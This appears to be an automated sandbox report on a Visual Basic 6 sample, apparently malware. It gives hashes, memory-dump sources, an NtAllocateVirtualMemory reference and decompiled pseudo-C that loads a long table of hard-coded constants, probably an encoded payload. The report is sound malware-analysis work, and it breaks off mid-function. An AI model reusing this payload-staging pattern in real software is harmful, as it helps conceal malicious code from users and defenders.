Instruction ID: 958f79ee5b8e34ff784647b06d0bce0c25beb3a826f1c8c4b9f1e6a0d9bffd97
Opcode Fuzzy Hash: ef85f3a9228cb57956d88697c7f5c1579384eadefb3097a1fb21b772c36a2d97
Instruction Fuzzy Hash: 71B1D071644388CFCF75EF68C9987EA37B2BF89310F51812ADC0A9B215DB349A42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02AE91AF, Relevance: 1.7, APIs: 1, Instructions: 192memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 02AE9372

Memory Dump Source

Source File: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, Offset: 02AE0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 47755d6be9ca636533bff045506b74f1baf1430a0ac185185c40a7b1a5f3c246
Instruction ID: 4bb217685472b0612daf912554ba42d7d2d445be6b95927a43b96e8966f9da0c
Opcode Fuzzy Hash: 47755d6be9ca636533bff045506b74f1baf1430a0ac185185c40a7b1a5f3c246
Instruction Fuzzy Hash: 4771E1706443499FCF70DF29CD957DA3BA6EF49350F41811AEC4EEB224D7348A868B12

Uniqueness

Uniqueness Score: -1.00%

Function 0041015B, Relevance: 109.1, APIs: 60, Strings: 2, Instructions: 606
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041015B(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				intOrPtr _v40;
				char _v52;
				short _v60;
				void* _v64;
				char _v80;
				char _v96;
				char* _v120;
				signed int _v128;
				signed int _v136;
				char _v144;
				void* _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				intOrPtr* _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _t508;
				char* _t513;
				signed int _t519;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				signed int _t541;
				signed int _t542;
				signed int _t543;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				signed int _t547;
				signed int _t548;
				signed int _t549;
				signed int _t550;
				signed int _t551;
				signed int _t552;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				void* _t630;
				void* _t632;
				intOrPtr _t633;

				_t633 = _t632 - 0xc;
				 *[fs:0x0] = _t633;
				L00401230();
				_v16 = _t633;
				_v12 = 0x401180;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401236, _t630);
				_push(3);
				_push(0x4029b8);
				_push( &_v52);
				L00401332();
				_v120 = L"4-4-4";
				_v128 = 8;
				L00401380();
				_push( &_v80);
				_push( &_v96); // executed
				L00401326(); // executed
				_v136 = 4;
				_v144 = 0x8002;
				_push( &_v96);
				_t508 =  &_v144;
				_push(_t508);
				L0040132C();
				_v156 = _t508;
				_push( &_v96);
				_push( &_v80);
				_push(2);
				L0040137A();
				if(_v156 == 0) {
					_v60 = 0x2d06;
				} else {
					if( *0x413418 != 0) {
						_v180 = 0x413418;
					} else {
						_push(0x413418);
						_push(0x40293c);
						L00401374();
						_v180 = 0x413418;
					}
					_v156 =  *_v180;
					_t519 =  *((intOrPtr*)( *_v156 + 0x14))(_v156,  &_v64);
					asm("fclex");
					_v160 = _t519;
					if(_v160 >= 0) {
						_v184 = _v184 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40292c);
						_push(_v156);
						_push(_v160);
						L0040136E();
						_v184 = _t519;
					}
					_v164 = _v64;
					_t524 =  *((intOrPtr*)( *_v164 + 0x78))(_v164,  &_v148);
					asm("fclex");
					_v168 = _t524;
					if(_v168 >= 0) {
						_v188 = _v188 & 0x00000000;
					} else {
						_push(0x78);
						_push(0x402950);
						_push(_v164);
						_push(_v168);
						L0040136E();
						_v188 = _t524;
					}
					_t525 = _v148;
					_v28 = _t525;
					L00401368();
					_v156 = _v156 & 0x00000000;
					if(_v156 >= 0x31) {
						L00401320();
						_v192 = _t525;
					} else {
						_v192 = _v192 & 0x00000000;
					}
					_t526 = _v156;
					 *((intOrPtr*)(_v40 + _t526 * 4)) = 0x7a4a25;
					_v156 = 1;
					if(_v156 >= 0x31) {
						L00401320();
						_v196 = _t526;
					} else {
						_v196 = _v196 & 0x00000000;
					}
					_t527 = _v156;
					 *((intOrPtr*)(_v40 + _t527 * 4)) = 0x19ee06;
					_v156 = 2;
					if(_v156 >= 0x31) {
						L00401320();
						_v200 = _t527;
					} else {
						_v200 = _v200 & 0x00000000;
					}
					_t528 = _v156;
					 *((intOrPtr*)(_v40 + _t528 * 4)) = 0x63daaf;
					_v156 = 3;
					if(_v156 >= 0x31) {
						L00401320();
						_v204 = _t528;
					} else {
						_v204 = _v204 & 0x00000000;
					}
					_t529 = _v156;
					 *((intOrPtr*)(_v40 + _t529 * 4)) = 0x44a4b9;
					_v156 = 4;
					if(_v156 >= 0x31) {
						L00401320();
						_v208 = _t529;
					} else {
						_v208 = _v208 & 0x00000000;
					}
					_t530 = _v156;
					 *((intOrPtr*)(_v40 + _t530 * 4)) = 0x835248;
					_v156 = 5;
					if(_v156 >= 0x31) {
						L00401320();
						_v212 = _t530;
					} else {
						_v212 = _v212 & 0x00000000;
					}
					_t531 = _v156;
					 *((intOrPtr*)(_v40 + _t531 * 4)) = 0x3de65c;
					_v156 = 6;
					if(_v156 >= 0x31) {
						L00401320();
						_v216 = _t531;
					} else {
						_v216 = _v216 & 0x00000000;
					}
					_t532 = _v156;
					 *((intOrPtr*)(_v40 + _t532 * 4)) = 0x6fbcfd;
					_v156 = 7;
					if(_v156 >= 0x31) {
						L00401320();
						_v220 = _t532;
					} else {
						_v220 = _v220 & 0x00000000;
					}
					_t533 = _v156;
					 *((intOrPtr*)(_v40 + _t533 * 4)) = 0x77edb6;
					_v156 = 8;
					if(_v156 >= 0x31) {
						L00401320();
						_v224 = _t533;
					} else {
						_v224 = _v224 & 0x00000000;
					}
					_t534 = _v156;
					 *((intOrPtr*)(_v40 + _t534 * 4)) = 0x19a532;
					_v156 = 9;
					if(_v156 >= 0x31) {
						L00401320();
						_v228 = _t534;
					} else {
						_v228 = _v228 & 0x00000000;
					}
					_t535 = _v156;
					 *((intOrPtr*)(_v40 + _t535 * 4)) = 0x8364d2;
					_v156 = 0xa;
					if(_v156 >= 0x31) {
						L00401320();
						_v232 = _t535;
					} else {
						_v232 = _v232 & 0x00000000;
					}
					_t536 = _v156;
					 *((intOrPtr*)(_v40 + _t536 * 4)) = 0x82e00d;
					_v156 = 0xb;
					if(_v156 >= 0x31) {
						L00401320();
						_v236 = _t536;
					} else {
						_v236 = _v236 & 0x00000000;
					}
					_t537 = _v156;
					 *((intOrPtr*)(_v40 + _t537 * 4)) = 0x64a378;
					_v156 = 0xc;
					if(_v156 >= 0x31) {
						L00401320();
						_v240 = _t537;
					} else {
						_v240 = _v240 & 0x00000000;
					}
					_t538 = _v156;
					 *((intOrPtr*)(_v40 + _t538 * 4)) = 0x37c21;
					_v156 = 0xd;
					if(_v156 >= 0x31) {
						L00401320();
						_v244 = _t538;
					} else {
						_v244 = _v244 & 0x00000000;
					}
					_t539 = _v156;
					 *((intOrPtr*)(_v40 + _t539 * 4)) = 0x3c4faf;
					_v156 = 0xe;
					if(_v156 >= 0x31) {
						L00401320();
						_v248 = _t539;
					} else {
						_v248 = _v248 & 0x00000000;
					}
					_t540 = _v156;
					 *((intOrPtr*)(_v40 + _t540 * 4)) = 0x688045;
					_v156 = 0xf;
					if(_v156 >= 0x31) {
						L00401320();
						_v252 = _t540;
					} else {
						_v252 = _v252 & 0x00000000;
					}
					_t541 = _v156;
					 *((intOrPtr*)(_v40 + _t541 * 4)) = 0x6cfbf5;
					_v156 = 0x10;
					if(_v156 >= 0x31) {
						L00401320();
						_v256 = _t541;
					} else {
						_v256 = _v256 & 0x00000000;
					}
					_t542 = _v156;
					 *((intOrPtr*)(_v40 + _t542 * 4)) = 0x57c80e;
					_v156 = 0x11;
					if(_v156 >= 0x31) {
						L00401320();
						_v260 = _t542;
					} else {
						_v260 = _v260 & 0x00000000;
					}
					_t543 = _v156;
					 *((intOrPtr*)(_v40 + _t543 * 4)) = 0x3f11d1;
					_v156 = 0x12;
					if(_v156 >= 0x31) {
						L00401320();
						_v264 = _t543;
					} else {
						_v264 = _v264 & 0x00000000;
					}
					_t544 = _v156;
					 *((intOrPtr*)(_v40 + _t544 * 4)) = 0x32427b;
					_v156 = 0x13;
					if(_v156 >= 0x31) {
						L00401320();
						_v268 = _t544;
					} else {
						_v268 = _v268 & 0x00000000;
					}
					_t545 = _v156;
					 *((intOrPtr*)(_v40 + _t545 * 4)) = 0x1ff3cc;
					_v156 = 0x14;
					if(_v156 >= 0x31) {
						L00401320();
						_v272 = _t545;
					} else {
						_v272 = _v272 & 0x00000000;
					}
					_t546 = _v156;
					 *((intOrPtr*)(_v40 + _t546 * 4)) = 0x6f2c6e;
					_v156 = 0x15;
					if(_v156 >= 0x31) {
						L00401320();
						_v276 = _t546;
					} else {
						_v276 = _v276 & 0x00000000;
					}
					_t547 = _v156;
					 *((intOrPtr*)(_v40 + _t547 * 4)) = 0x650517;
					_v156 = 0x16;
					if(_v156 >= 0x31) {
						L00401320();
						_v280 = _t547;
					} else {
						_v280 = _v280 & 0x00000000;
					}
					_t548 = _v156;
					 *((intOrPtr*)(_v40 + _t548 * 4)) = 0x3a594a;
					_v156 = 0x17;
					if(_v156 >= 0x31) {
						L00401320();
						_v284 = _t548;
					} else {
						_v284 = _v284 & 0x00000000;
					}
					_t549 = _v156;
					 *((intOrPtr*)(_v40 + _t549 * 4)) = 0x582f52;
					_v156 = 0x18;
					if(_v156 >= 0x31) {
						L00401320();
						_v288 = _t549;
					} else {
						_v288 = _v288 & 0x00000000;
					}
					_t550 = _v156;
					 *((intOrPtr*)(_v40 + _t550 * 4)) = 0x9f792;
					_v156 = 0x19;
					if(_v156 >= 0x31) {
						L00401320();
						_v292 = _t550;
					} else {
						_v292 = _v292 & 0x00000000;
					}
					_t551 = _v156;
					 *((intOrPtr*)(_v40 + _t551 * 4)) = 0x632b52;
					_v156 = 0x1a;
					if(_v156 >= 0x31) {
						L00401320();
						_v296 = _t551;
					} else {
						_v296 = _v296 & 0x00000000;
					}
					_t552 = _v156;
					 *((intOrPtr*)(_v40 + _t552 * 4)) = 0x3556ef;
					_v156 = 0x1b;
					if(_v156 >= 0x31) {
						L00401320();
						_v300 = _t552;
					} else {
						_v300 = _v300 & 0x00000000;
					}
					_t553 = _v156;
					 *((intOrPtr*)(_v40 + _t553 * 4)) = 0x1fe633;
					_v156 = 0x1c;
					if(_v156 >= 0x31) {
						L00401320();
						_v304 = _t553;
					} else {
						_v304 = _v304 & 0x00000000;
					}
					_t554 = _v156;
					 *((intOrPtr*)(_v40 + _t554 * 4)) = 0xf1bcf;
					_v156 = 0x1d;
					if(_v156 >= 0x31) {
						L00401320();
						_v308 = _t554;
					} else {
						_v308 = _v308 & 0x00000000;
					}
					_t555 = _v156;
					 *((intOrPtr*)(_v40 + _t555 * 4)) = 0x3be80d;
					_v156 = 0x1e;
					if(_v156 >= 0x31) {
						L00401320();
						_v312 = _t555;
					} else {
						_v312 = _v312 & 0x00000000;
					}
					_t556 = _v156;
					 *((intOrPtr*)(_v40 + _t556 * 4)) = 0x250fc;
					_v156 = 0x1f;
					if(_v156 >= 0x31) {
						L00401320();
						_v316 = _t556;
					} else {
						_v316 = _v316 & 0x00000000;
					}
					_t557 = _v156;
					 *((intOrPtr*)(_v40 + _t557 * 4)) = 0x27171c;
					_v156 = 0x20;
					if(_v156 >= 0x31) {
						L00401320();
						_v320 = _t557;
					} else {
						_v320 = _v320 & 0x00000000;
					}
					_t558 = _v156;
					 *((intOrPtr*)(_v40 + _t558 * 4)) = 0x358431;
					_v156 = 0x21;
					if(_v156 >= 0x31) {
						L00401320();
						_v324 = _t558;
					} else {
						_v324 = _v324 & 0x00000000;
					}
					_t559 = _v156;
					 *((intOrPtr*)(_v40 + _t559 * 4)) = 0x49bb22;
					_v156 = 0x22;
					if(_v156 >= 0x31) {
						L00401320();
						_v328 = _t559;
					} else {
						_v328 = _v328 & 0x00000000;
					}
					_t560 = _v156;
					 *((intOrPtr*)(_v40 + _t560 * 4)) = 0x1404db;
					_v156 = 0x23;
					if(_v156 >= 0x31) {
						L00401320();
						_v332 = _t560;
					} else {
						_v332 = _v332 & 0x00000000;
					}
					_t561 = _v156;
					 *((intOrPtr*)(_v40 + _t561 * 4)) = 0x7571b7;
					_v156 = 0x24;
					if(_v156 >= 0x31) {
						L00401320();
						_v336 = _t561;
					} else {
						_v336 = _v336 & 0x00000000;
					}
					_t562 = _v156;
					 *((intOrPtr*)(_v40 + _t562 * 4)) = 0x7b7cb;
					_v156 = 0x25;
					if(_v156 >= 0x31) {
						L00401320();
						_v340 = _t562;
					} else {
						_v340 = _v340 & 0x00000000;
					}
					_t563 = _v156;
					 *((intOrPtr*)(_v40 + _t563 * 4)) = 0x59a7dd;
					_v156 = 0x26;
					if(_v156 >= 0x31) {
						L00401320();
						_v344 = _t563;
					} else {
						_v344 = _v344 & 0x00000000;
					}
					_t564 = _v156;
					 *((intOrPtr*)(_v40 + _t564 * 4)) = 0x605499;
					_v156 = 0x27;
					if(_v156 >= 0x31) {
						L00401320();
						_v348 = _t564;
					} else {
						_v348 = _v348 & 0x00000000;
					}
					_t565 = _v156;
					 *((intOrPtr*)(_v40 + _t565 * 4)) = 0x63e6bc;
					_v156 = 0x28;
					if(_v156 >= 0x31) {
						L00401320();
						_v352 = _t565;
					} else {
						_v352 = _v352 & 0x00000000;
					}
					_t566 = _v156;
					 *((intOrPtr*)(_v40 + _t566 * 4)) = 0x9d20e;
					_v156 = 0x29;
					if(_v156 >= 0x31) {
						L00401320();
						_v356 = _t566;
					} else {
						_v356 = _v356 & 0x00000000;
					}
					_t567 = _v156;
					 *((intOrPtr*)(_v40 + _t567 * 4)) = 0x83edf3;
					_v156 = 0x2a;
					if(_v156 >= 0x31) {
						L00401320();
						_v360 = _t567;
					} else {
						_v360 = _v360 & 0x00000000;
					}
					_t568 = _v156;
					 *((intOrPtr*)(_v40 + _t568 * 4)) = 0x84c14e;
					_v156 = 0x2b;
					if(_v156 >= 0x31) {
						L00401320();
						_v364 = _t568;
					} else {
						_v364 = _v364 & 0x00000000;
					}
					_t569 = _v156;
					 *((intOrPtr*)(_v40 + _t569 * 4)) = 0x5489c9;
					_v156 = 0x2c;
					if(_v156 >= 0x31) {
						L00401320();
						_v368 = _t569;
					} else {
						_v368 = _v368 & 0x00000000;
					}
					_t570 = _v156;
					 *((intOrPtr*)(_v40 + _t570 * 4)) = 0x532aef;
					_v156 = 0x2d;
					if(_v156 >= 0x31) {
						L00401320();
						_v372 = _t570;
					} else {
						_v372 = _v372 & 0x00000000;
					}
					_t571 = _v156;
					 *((intOrPtr*)(_v40 + _t571 * 4)) = 0x1c685;
					_v156 = 0x2e;
					if(_v156 >= 0x31) {
						L00401320();
						_v376 = _t571;
					} else {
						_v376 = _v376 & 0x00000000;
					}
					_t572 = _v156;
					 *((intOrPtr*)(_v40 + _t572 * 4)) = 0xd3a8a;
					_v156 = 0x2f;
					if(_v156 >= 0x31) {
						L00401320();
						_v380 = _t572;
					} else {
						_v380 = _v380 & 0x00000000;
					}
					_t573 = _v156;
					 *((intOrPtr*)(_v40 + _t573 * 4)) = 0x54ced4;
					_v156 = 0x30;
					if(_v156 >= 0x31) {
						L00401320();
						_v384 = _t573;
					} else {
						_v384 = _v384 & 0x00000000;
					}
					 *((intOrPtr*)(_v40 + _v156 * 4)) = 0x5cfca4;
				}
				_push(0x410dde);
				_v152 =  &_v52;
				_t513 =  &_v152;
				_push(_t513);
				_push(0);
				L0040131A();
				return _t513;
			}

0x0041015e
0x0041016d
0x00410179
0x00410181
0x00410184
0x0041018b
0x0041019a
0x0041019d
0x0041019f
0x004101a7
0x004101a8
0x004101ad
0x004101b4
0x004101c1
0x004101c9
0x004101cd
0x004101ce
0x004101d3
0x004101dd
0x004101ea
0x004101eb
0x004101f1
0x004101f2
0x004101f7
0x00410201
0x00410205
0x00410206
0x00410208
0x00410219
0x00410d9a
0x0041021f
0x00410226
0x00410243
0x00410228
0x00410228
0x0041022d
0x00410232
0x00410237
0x00410237
0x00410255
0x0041026d
0x00410270
0x00410272
0x0041027f
0x004102a1
0x00410281
0x00410281
0x00410283
0x00410288
0x0041028e
0x00410294
0x00410299
0x00410299
0x004102ab
0x004102c6
0x004102c9
0x004102cb
0x004102d8
0x004102fa
0x004102da
0x004102da
0x004102dc
0x004102e1
0x004102e7
0x004102ed
0x004102f2
0x004102f2
0x00410301
0x00410308
0x0041030f
0x00410314
0x00410322
0x0041032d
0x00410332
0x00410324
0x00410324
0x00410324
0x00410338
0x00410341
0x00410348
0x00410359
0x00410364
0x00410369
0x0041035b
0x0041035b
0x0041035b
0x0041036f
0x00410378
0x0041037f
0x00410390
0x0041039b
0x004103a0
0x00410392
0x00410392
0x00410392
0x004103a6
0x004103af
0x004103b6
0x004103c7
0x004103d2
0x004103d7
0x004103c9
0x004103c9
0x004103c9
0x004103dd
0x004103e6
0x004103ed
0x004103fe
0x00410409
0x0041040e
0x00410400
0x00410400
0x00410400
0x00410414
0x0041041d
0x00410424
0x00410435
0x00410440
0x00410445
0x00410437
0x00410437
0x00410437
0x0041044b
0x00410454
0x0041045b
0x0041046c
0x00410477
0x0041047c
0x0041046e
0x0041046e
0x0041046e
0x00410482
0x0041048b
0x00410492
0x004104a3
0x004104ae
0x004104b3
0x004104a5
0x004104a5
0x004104a5
0x004104b9
0x004104c2
0x004104c9
0x004104da
0x004104e5
0x004104ea
0x004104dc
0x004104dc
0x004104dc
0x004104f0
0x004104f9
0x00410500
0x00410511
0x0041051c
0x00410521
0x00410513
0x00410513
0x00410513
0x00410527
0x00410530
0x00410537
0x00410548
0x00410553
0x00410558
0x0041054a
0x0041054a
0x0041054a
0x0041055e
0x00410567
0x0041056e
0x0041057f
0x0041058a
0x0041058f
0x00410581
0x00410581
0x00410581
0x00410595
0x0041059e
0x004105a5
0x004105b6
0x004105c1
0x004105c6
0x004105b8
0x004105b8
0x004105b8
0x004105cc
0x004105d5
0x004105dc
0x004105ed
0x004105f8
0x004105fd
0x004105ef
0x004105ef
0x004105ef
0x00410603
0x0041060c
0x00410613
0x00410624
0x0041062f
0x00410634
0x00410626
0x00410626
0x00410626
0x0041063a
0x00410643
0x0041064a
0x0041065b
0x00410666
0x0041066b
0x0041065d
0x0041065d
0x0041065d
0x00410671
0x0041067a
0x00410681
0x00410692
0x0041069d
0x004106a2
0x00410694
0x00410694
0x00410694
0x004106a8
0x004106b1
0x004106b8
0x004106c9
0x004106d4
0x004106d9
0x004106cb
0x004106cb
0x004106cb
0x004106df
0x004106e8
0x004106ef
0x00410700
0x0041070b
0x00410710
0x00410702
0x00410702
0x00410702
0x00410716
0x0041071f
0x00410726
0x00410737
0x00410742
0x00410747
0x00410739
0x00410739
0x00410739
0x0041074d
0x00410756
0x0041075d
0x0041076e
0x00410779
0x0041077e
0x00410770
0x00410770
0x00410770
0x00410784
0x0041078d
0x00410794
0x004107a5
0x004107b0
0x004107b5
0x004107a7
0x004107a7
0x004107a7
0x004107bb
0x004107c4
0x004107cb
0x004107dc
0x004107e7
0x004107ec
0x004107de
0x004107de
0x004107de
0x004107f2
0x004107fb
0x00410802
0x00410813
0x0041081e
0x00410823
0x00410815
0x00410815
0x00410815
0x00410829
0x00410832
0x00410839
0x0041084a
0x00410855
0x0041085a
0x0041084c
0x0041084c
0x0041084c
0x00410860
0x00410869
0x00410870
0x00410881
0x0041088c
0x00410891
0x00410883
0x00410883
0x00410883
0x00410897
0x004108a0
0x004108a7
0x004108b8
0x004108c3
0x004108c8
0x004108ba
0x004108ba
0x004108ba
0x004108ce
0x004108d7
0x004108de
0x004108ef
0x004108fa
0x004108ff
0x004108f1
0x004108f1
0x004108f1
0x00410905
0x0041090e
0x00410915
0x00410926
0x00410931
0x00410936
0x00410928
0x00410928
0x00410928
0x0041093c
0x00410945
0x0041094c
0x0041095d
0x00410968
0x0041096d
0x0041095f
0x0041095f
0x0041095f
0x00410973
0x0041097c
0x00410983
0x00410994
0x0041099f
0x004109a4
0x00410996
0x00410996
0x00410996
0x004109aa
0x004109b3
0x004109ba
0x004109cb
0x004109d6
0x004109db
0x004109cd
0x004109cd
0x004109cd
0x004109e1
0x004109ea
0x004109f1
0x00410a02
0x00410a0d
0x00410a12
0x00410a04
0x00410a04
0x00410a04
0x00410a18
0x00410a21
0x00410a28
0x00410a39
0x00410a44
0x00410a49
0x00410a3b
0x00410a3b
0x00410a3b
0x00410a4f
0x00410a58
0x00410a5f
0x00410a70
0x00410a7b
0x00410a80
0x00410a72
0x00410a72
0x00410a72
0x00410a86
0x00410a8f
0x00410a96
0x00410aa7
0x00410ab2
0x00410ab7
0x00410aa9
0x00410aa9
0x00410aa9
0x00410abd
0x00410ac6
0x00410acd
0x00410ade
0x00410ae9
0x00410aee
0x00410ae0
0x00410ae0
0x00410ae0
0x00410af4
0x00410afd
0x00410b04
0x00410b15
0x00410b20
0x00410b25
0x00410b17
0x00410b17
0x00410b17
0x00410b2b
0x00410b34
0x00410b3b
0x00410b4c
0x00410b57
0x00410b5c
0x00410b4e
0x00410b4e
0x00410b4e
0x00410b62
0x00410b6b
0x00410b72
0x00410b83
0x00410b8e
0x00410b93
0x00410b85
0x00410b85
0x00410b85
0x00410b99
0x00410ba2
0x00410ba9
0x00410bba
0x00410bc5
0x00410bca
0x00410bbc
0x00410bbc
0x00410bbc
0x00410bd0
0x00410bd9
0x00410be0
0x00410bf1
0x00410bfc
0x00410c01
0x00410bf3
0x00410bf3
0x00410bf3
0x00410c07
0x00410c10
0x00410c17
0x00410c28
0x00410c33
0x00410c38
0x00410c2a
0x00410c2a
0x00410c2a
0x00410c3e
0x00410c47
0x00410c4e
0x00410c5f
0x00410c6a
0x00410c6f
0x00410c61
0x00410c61
0x00410c61
0x00410c75
0x00410c7e
0x00410c85
0x00410c96
0x00410ca1
0x00410ca6
0x00410c98
0x00410c98
0x00410c98
0x00410cac
0x00410cb5
0x00410cbc
0x00410ccd
0x00410cd8
0x00410cdd
0x00410ccf
0x00410ccf
0x00410ccf
0x00410ce3
0x00410cec
0x00410cf3
0x00410d04
0x00410d0f
0x00410d14
0x00410d06
0x00410d06
0x00410d06
0x00410d1a
0x00410d23
0x00410d2a
0x00410d3b
0x00410d46
0x00410d4b
0x00410d3d
0x00410d3d
0x00410d3d
0x00410d51
0x00410d5a
0x00410d61
0x00410d72
0x00410d7d
0x00410d82
0x00410d74
0x00410d74
0x00410d74
0x00410d91
0x00410d91
0x00410da0
0x00410dc9
0x00410dcf
0x00410dd5
0x00410dd6
0x00410dd8
0x00410ddd

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 00410179
__vbaAryConstruct2.MSVBVM60(?,004029B8,00000003,?,?,?,?,00401236), ref: 004101A8
__vbaVarDup.MSVBVM60 ref: 004101C1
#545.MSVBVM60(?,?), ref: 004101CE
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 004101F2
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 00410208
__vbaNew2.MSVBVM60(0040293C,00413418,?,?,00401236), ref: 00410232
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040292C,00000014), ref: 00410294
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402950,00000078), ref: 004102ED
__vbaFreeObj.MSVBVM60(00000000,?,00402950,00000078), ref: 0041030F
__vbaGenerateBoundsError.MSVBVM60 ref: 0041032D
__vbaGenerateBoundsError.MSVBVM60 ref: 00410364
__vbaGenerateBoundsError.MSVBVM60 ref: 0041039B
__vbaGenerateBoundsError.MSVBVM60 ref: 004103D2
__vbaGenerateBoundsError.MSVBVM60 ref: 00410409
__vbaGenerateBoundsError.MSVBVM60 ref: 00410440
__vbaGenerateBoundsError.MSVBVM60 ref: 00410477
__vbaGenerateBoundsError.MSVBVM60 ref: 004104AE
__vbaGenerateBoundsError.MSVBVM60 ref: 004104E5
__vbaGenerateBoundsError.MSVBVM60 ref: 0041051C
__vbaGenerateBoundsError.MSVBVM60 ref: 00410553
__vbaGenerateBoundsError.MSVBVM60 ref: 0041058A
__vbaGenerateBoundsError.MSVBVM60 ref: 004105C1
__vbaGenerateBoundsError.MSVBVM60 ref: 004105F8
__vbaGenerateBoundsError.MSVBVM60 ref: 0041062F
__vbaGenerateBoundsError.MSVBVM60 ref: 00410666
__vbaGenerateBoundsError.MSVBVM60 ref: 0041069D
__vbaGenerateBoundsError.MSVBVM60 ref: 004106D4
__vbaGenerateBoundsError.MSVBVM60 ref: 0041070B
__vbaGenerateBoundsError.MSVBVM60 ref: 00410742
__vbaGenerateBoundsError.MSVBVM60 ref: 00410779
__vbaGenerateBoundsError.MSVBVM60 ref: 004107B0
__vbaGenerateBoundsError.MSVBVM60 ref: 004107E7
__vbaGenerateBoundsError.MSVBVM60 ref: 0041081E
__vbaGenerateBoundsError.MSVBVM60 ref: 00410855
__vbaGenerateBoundsError.MSVBVM60 ref: 0041088C
__vbaGenerateBoundsError.MSVBVM60 ref: 004108C3
__vbaGenerateBoundsError.MSVBVM60 ref: 004108FA
__vbaGenerateBoundsError.MSVBVM60 ref: 00410931
__vbaGenerateBoundsError.MSVBVM60 ref: 00410968
__vbaGenerateBoundsError.MSVBVM60 ref: 0041099F
__vbaGenerateBoundsError.MSVBVM60 ref: 004109D6
__vbaGenerateBoundsError.MSVBVM60 ref: 00410A0D
__vbaGenerateBoundsError.MSVBVM60 ref: 00410A44
__vbaGenerateBoundsError.MSVBVM60 ref: 00410A7B
__vbaGenerateBoundsError.MSVBVM60 ref: 00410AB2
__vbaGenerateBoundsError.MSVBVM60 ref: 00410AE9
__vbaGenerateBoundsError.MSVBVM60 ref: 00410B20
__vbaGenerateBoundsError.MSVBVM60 ref: 00410B57
__vbaGenerateBoundsError.MSVBVM60 ref: 00410B8E
__vbaGenerateBoundsError.MSVBVM60 ref: 00410BC5
__vbaGenerateBoundsError.MSVBVM60 ref: 00410BFC
__vbaGenerateBoundsError.MSVBVM60 ref: 00410C33
__vbaGenerateBoundsError.MSVBVM60 ref: 00410C6A
__vbaGenerateBoundsError.MSVBVM60 ref: 00410CA1
__vbaGenerateBoundsError.MSVBVM60 ref: 00410CD8
__vbaGenerateBoundsError.MSVBVM60 ref: 00410D0F
__vbaGenerateBoundsError.MSVBVM60 ref: 00410D46
__vbaGenerateBoundsError.MSVBVM60 ref: 00410D7D
__vbaAryDestruct.MSVBVM60(00000000,?,00410DDE), ref: 00410DD8

Strings

1, xrefs: 00410D6B
4-4-4, xrefs: 004101AD

Memory Dump Source

Source File: 00000003.00000002.762481080.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.762462032.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.762549972.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.762578524.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$BoundsErrorGenerate$CheckFreeHresult$#545ChkstkConstruct2DestructListNew2
String ID: 1$4-4-4
API String ID: 500800152-725662731
Opcode ID: 2be7f56c62499ea3f45b1053406f9eb40c777809dd6be603cb50c1490847d2fc
Instruction ID: ae7b9fd5c9d8c55e3c704114620e82490c2909e2bfd5d3546ff863c43ef30748
Opcode Fuzzy Hash: 2be7f56c62499ea3f45b1053406f9eb40c777809dd6be603cb50c1490847d2fc
Instruction Fuzzy Hash: B07281B4900228CBDB64DF64C9857ECB7B0BB1A319F2040DAD50D66742CBBA5EC9CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00411684, Relevance: 61.6, APIs: 29, Strings: 6, Instructions: 363
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00411684(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				short _v40;
				void* _v56;
				char _v60;
				char _v64;
				void* _v68;
				short _v72;
				intOrPtr _v76;
				intOrPtr _v80;
